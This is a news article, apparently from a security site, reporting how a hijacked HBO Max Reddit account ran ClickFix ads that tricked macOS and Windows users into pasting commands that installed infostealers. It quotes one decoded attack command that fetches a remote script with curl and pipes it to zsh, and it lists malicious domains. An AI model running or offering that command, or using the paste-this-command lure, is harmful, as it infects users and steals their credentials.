LmCast :: Stay tuned in

Hackers hijack HBO Max Reddit account to push malware in ClickFix ads

Recorded: Sept. 14, 2026, 7:08 p.m.

Original Summarized

Hackers hijack HBO Max Reddit account to push malware in ClickFix ads

News

Featured
Latest

Microsoft: September updates cause RDS failures on Windows Server

Dutch NCSC: Critical Check Point VPN flaws exploitation is imminent

New Android malware encrypts files, steals data, and harasses victims

Florida confirms DMV database breached via stolen police account

Hackers hijack HBO Max Reddit account to push malware in ClickFix ads

Hackers target exposed Vite dev servers to steal AWS, Azure secrets

Why Patch Automation Needs Brakes, Not Just an Accelerator

Webinar: How malicious OAuth apps can lead to Google Workspace breaches

Tutorials

Latest
Popular

How to access the Dark Web using the Tor Browser

How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11

How to use the Windows Registry Editor

How to backup and restore the Windows Registry

How to start Windows in Safe Mode

How to remove a Trojan, Virus, Worm, or other Malware

How to show hidden files in Windows 7

How to see hidden files in Windows

Webinars
Downloads

Latest
Most Downloaded

Qualys BrowserCheck

STOPDecrypter

AuroraDecrypter

FilesLockerDecrypter

AdwCleaner

ComboFix

RKill

Junkware Removal Tool

Deals

Categories

eLearning

IT Certification Courses

Gear + Gadgets

Security

VPNs

Popular

Best VPNs

How to change IP address

Access the dark web safely

Best VPN for YouTube

Forums
More

Virus Removal Guides
Startup Database
Uninstall Database
Glossary
Send us a Tip!
Welcome Guide

HomeNewsSecurityHackers hijack HBO Max Reddit account to push malware in ClickFix ads

Hackers hijack HBO Max Reddit account to push malware in ClickFix ads

By Lawrence Abrams

September 14, 2026
02:34 PM
0

Hackers compromised HBO Max's official Reddit account and used it to push malicious ads that launched ClickFix attacks to infect Windows and macOS devices with information-stealing malware.
Security researchers at Hudson Rock and ADAMnetworks analyzed the campaign and say the verified u/hbomax Reddit account was hijacked and used to launch 108 malicious advertisements over about 48 hours.
The ads used a social engineering technique known as ClickFix, which tricks users into copying and pasting malicious commands into Windows Run, PowerShell, or macOS Terminal while pretending to fix an error, verify a CAPTCHA, or install legitimate software.
The type of attack has become increasingly popular among cybercriminals because victims run the malicious commands themselves using legitimate operating system tools, potentially bypassing some browser and security software designed to detect malware downloads.
While some of the advertisements pushed by the HBO Max account impersonated the streaming service, others promoted fake AI tools, developer software, and macOS utilities.
Hudson Rock and ADAMnetworks have linked the attack to a larger campaign they call PasteSwitch, which targets both Windows and macOS systems and has been used to distribute information stealers, loaders, cryptocurrency clippers, and fake cryptocurrency wallet applications.
The researchers say PasteSwitch refers to the operation's use of attacker-supplied commands that victims paste into their systems, while the attackers' backend switches between campaigns, platforms, payloads, and crypto theft methods depending on the visitor.
BleepingComputer contacted HBO and Warner Bros. Discovery with questions about the incident but has not received a response.
Fake HBO Max app delivers malware
The campaign was initially discovered after a Reddit user spotted an advertisement posted from the verified HBO Max account promoting what appeared to be a native HBO Max application for macOS.

Malicious HBO Max advertising on RedditSource: Adam Networks
"I was browsing Reddit and saw an ad displaying u/hbomax as the author - this advertised a macOS HBO Max app which I'd not heard of and was interested in. The user is verified and appears to have posted many times in the official HBO Max subreddits," warned the user.
"The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button / download. Clicking these opens up the classic infostealer/clickfix paste this command to download. Having checked, this downloads an executable with other capabilities for account compromise (obviously all done in a full sandbox - inspecting the output only, not running anything)."
After clicking the advertisement, users were redirected to a convincing fake HBO Max website that claimed to offer the application for download.
One of the fake HBO Max sites used in the campaign was hbomaxx[.]us. However, clicking the download button did not download an app, but instead displayed instructions telling visitors to open Terminal and paste a command to install the software.

 
One of the macOS commands BleepingComputer saw in this attack used Base64 encoding to obscure the command it executed. Once decoded, it contained the following command:

export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh
Hudson Rock noted ember-bridge[.]com as infrastructure used in September for malware delivery in the PasteSwitch operation.
One malware family used in this attack is MacSync, which Hudson Rock says steals browser credentials, Firefox profiles, Telegram data, Apple Notes, and macOS passwords.
Another attack chain deployed "AMOS helper," which establishes persistence using a directory named .com.apple.accountsd. The malware can then enroll infected systems with attacker-controlled servers to receive additional tasks.
The campaign has also distributed fake Ledger, Trezor Suite, and Exodus cryptocurrency wallet applications designed to steal victims' wallet recovery phrases.
On Windows systems, PasteSwitch has been observed displaying instructions that cause victims to execute commands using mshta and PowerShell.
Hudson Rock says one Windows attack chain used an MP3/HTA polyglot to create a scheduled task, launch 32-bit PowerShell, disable Microsoft's Antimalware Scan Interface (AMSI), and generate victim-specific infrastructure based on the computer name and username.
Later stages used obfuscated PowerShell and shellcode to load the Amatera Stealer directly into memory without first saving the final payload to disk.
PasteSwitch has also been seen pushing cryptocurrency clipboard hijacking malware, including AnimateClipper and ZigClipper.
The researchers say the HBO Max advertisement was part of a much larger advertising campaign run through the compromised Reddit account.
The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com.
This allowed the attackers to target a larger audience than just HBO Max users, including developers and users searching for AI software and system utilities.
After the malicious advertisements were reported, a Reddit admin paused them and reported them to Reddit's Security and Safety teams.
It remains unclear how the attackers accessed the HBO Max Reddit account or whether any other HBO or Warner Bros. Discovery accounts or systems were affected.

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.
Save your seat

Related Articles:
Passkey-themed phishing attacks lead to Microsoft 365 data theftHow Threat Actors Are Turning Trusted AI Platforms Into an Attack SurfaceThe Top 4 Threats We Found by Investigating Every Alert for a QuarterCalifornia man admits to laundering crypto stolen in $230M heistMan gets six years for hacking 750 women's Snapchat accounts

AMOS
ClickFix
Crypto theft
HBO Max
Infostealer
Reddit
Social Engineering

Lawrence Abrams
Lawrence Abrams is the owner and Editor in Chief of BleepingComputer.com. Lawrence's area of expertise includes Windows, malware removal, and computer forensics. Lawrence Abrams is a co-author of the Winternals Defragmentation, Recovery, and Administration Field Guide and the technical editor for Rootkits for Dummies.

Previous Article
Next Article

Post a Comment Community Rules

You need to login in order to post a comment
Not a member yet? Register Now

You may also like:

  Upcoming Webinar

Popular Stories

Passkey-themed phishing attacks lead to Microsoft 365 data theft

Hackers abused Claude to extract secrets from 1.8M Android apps

GitLab urges users to patch max severity path traversal flaw

Sponsor Posts

Stay one step ahead of new threats in the new year. Join Huntress for the monthly Tradecraft Tuesday.

EtherHiding Malware on macOS: How Attackers Hide C2 on the Blockchain

Find your gaps before an auditor does. Check your EU CRA readiness in 5 questions. 

Overdue a password health-check? Audit your Active Directory for free

Patch automation needs more than speed. Action1 brings control into every stage of deployment.

  Upcoming Webinar

Follow us:

Main Sections

News
Webinars
VPN Buyer Guides
SysAdmin Software Guides
Downloads
Virus Removal Guides
Tutorials
Startup Database
Uninstall Database
Glossary

Community

Forums
Forum Rules
Chat

Useful Resources

Welcome Guide
Sitemap

Company

About BleepingComputer
Contact Us
Send us a Tip!
Advertising
Write for BleepingComputer
Social & Feeds
Changelog

Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure

Copyright @ 2003 - 2026 Bleeping Computer® LLC - All Rights Reserved

Login

Username

Password

Remember Me

Sign in anonymously

Sign in with Twitter

Not a member yet? Register Now


Reporter

Help us understand the problem. What is going on with this comment?

Spam

Abusive or Harmful

Inappropriate content

Strong language

Other

Read our posting guidelinese to learn what content is prohibited.

Submitting...
SUBMIT

Hackers exploited the official HBO Max Reddit account to distribute malware through malicious advertisements employing a social engineering technique known as ClickFix, resulting in infections across Windows and macOS systems. Security researchers from Hudson Rock and ADAMnetworks analyzed this campaign, which they termed PasteSwitch, revealing a broader operation designed to distribute various malicious payloads. The method relied on tricking victims into executing harmful commands by having them copy and paste them into legitimate system tools such as Windows Run, PowerShell, or macOS Terminal, under the pretense of fixing errors or installing legitimate software. This technique proved effective because victims executed the malicious commands themselves using built-in operating system utilities, which can potentially bypass certain browser and security software designed to detect malware downloads.

The advertisements pushed by the compromised account were multifaceted; while some impersonated the streaming service, others promoted fake applications, AI tools, developer software, and macOS utilities, allowing the attackers to target a wider audience beyond HBO Max subscribers, including developers and users seeking specific software. The campaign systematically distributed information stealers, loaders, cryptocurrency clippers, and fake cryptocurrency wallet applications across targeted systems.

The PasteSwitch operation involved attackers dynamically switching between different campaigns, platforms, payloads, and cryptocurrency theft methods based on the visitor's context, facilitated by attacker-supplied commands pasted by the victims. For macOS systems, one malware family observed in the attack was MacSync, which is capable of stealing sensitive data including browser credentials, Firefox profiles, Telegram data, Apple Notes, and macOS passwords. Persistence was established through the deployment of an AMOS helper, which utilized a directory named .com.apple.accountsd, enabling the malware to enroll infected systems with attacker-controlled servers to receive further instructions.

On Windows systems, the attack chain utilized more complex methods to achieve execution and stealth. Researchers observed attacks using an MP3/HTA polyglot to create scheduled tasks, launch thirty-two bit PowerShell instances, disable the Microsoft Antimalware Scan Interface (AMSI), and generate victim-specific infrastructure based on the computer's name and username. Later stages leveraged obfuscated PowerShell and shellcode to load the Amatera Stealer directly into memory without saving the final payload to disk. Furthermore, the campaign included distribution of cryptocurrency clipboard hijacking malware, such as AnimateClipper and ZigClipper. The infrastructure for malware delivery, including commands used in the attack, utilized systems like ember-bridge.com. Although the attackers targeted HBO Max, the scope of the advertising included links pointing to domains associated with fake applications and guides, such as hbomaxx[.]app, codex-craft[.]com, and apple.clean-disk-guide[.]com, indicating an expanded reach into areas focused on AI and system utilities. The malicious advertisements were eventually paused by a Reddit administrator who reported them to Reddit’s security teams.